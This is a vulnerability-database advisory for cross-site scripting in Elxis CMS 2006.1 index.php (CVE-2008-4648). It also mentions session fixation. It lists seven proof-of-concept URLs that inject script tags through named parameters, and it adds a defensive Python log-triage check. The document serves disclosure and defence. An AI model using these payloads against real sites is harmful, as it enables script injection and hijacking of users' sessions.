Elxis CMS 'index.php' Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1116404
Vulnerability type: Cross-site scripting
Published: 2008-10-14
Updated: 2008-10-22
CVE ID: CVE-2008-4648
CNNVD-ID: CNNVD-200810-349
Platform: PHP
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/32487
https://cxsecurity.com/issue/WLB-2012030016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-349
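|Vulnerability details
index.php in Elxis CMS contains a cross-site scripting vulnerability. Remote attackers can inject arbitrary web script or HTML via PATH_INFO or the option, Itemid, id, task, bid, and contact_id parameters.
|Vulnerability EXP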
source: http://www.securityfocus.com/bid/31764/info

Elxis CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. The application is also prone to a session-fixation vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Using the session-fixation issue, the attacker can hijack the session and gain unauthorized access to the affected application.

Elxis CMS 2006.1 is vulnerable; other versions may also be affected.

http://www.example.net/index.php?>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>
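
For defenders, a check that flags requests to index.php where PATH_INFO or one of the parameters named above carries markup or an unexpected value, usable for access-log triage or as a request filter. This is an added example, not code from Elxis or from the advisory; the function name `findings` and the assumption that Itemid, id, bid and contact_id are integers and option/task are plain identifiers are illustrative.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters named in the advisory. Treating these four as integers and
# option/task as plain identifiers is an assumption of this example.
NUMERIC_PARAMS = {"Itemid", "id", "bid", "contact_id"}
IDENT_PARAMS = {"option", "task"}
MARKUP = re.compile(r"[<>\"']")


def findings(url):
    """Return (location, reason) pairs for one request URL to index.php."""
    parts = urlsplit(url)
    out = []
    # PATH_INFO is whatever follows the script name in the path.
    path_info = parts.path.partition("index.php")[2]
    if MARKUP.search(unquote(path_info)):
        out.append(("PATH_INFO", "markup characters"))
    # parse_qsl percent-decodes names and values before they are checked.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if MARKUP.search(name):
            out.append(("query", "markup in parameter name"))
        elif name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            out.append((name, "not an integer"))
        elif name in IDENT_PARAMS and not re.fullmatch(r"[A-Za-z0-9_]+", value):
            out.append((name, "not a plain identifier"))
        elif MARKUP.search(value):
            out.append((name, "markup characters"))
    return out


# Constructed sample: one ordinary request plus two request shapes from the list above.
SAMPLES = [
    "http://www.example.net/index.php?option=com_poll&Itemid=1&task=view&id=14",
    'http://www.example.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>',
    'http://www.example.net/index.php?>"><script>alert("XSS Vuln")</script>',
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(findings(url) or "clean", "<-", url)
```

The same allow-list rules belong in the application itself, together with HTML-encoding every value on output; the log check only shows which requests would have been rejected.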
|References

Source: XF
Name: elxis-index-xss(45866)
Link: http://xforce.iss.net/xforce/xfdb/45866
Source: BID
Name: 31764
Link: http://www.securityfocus.com/bid/31764
Source: SECUNIA
Name: 32278
Link: http://secunia.com/advisories/32278
Source: MISC
Link: http://packetstormsecurity.org/0810-exploits/elxis-xss.txt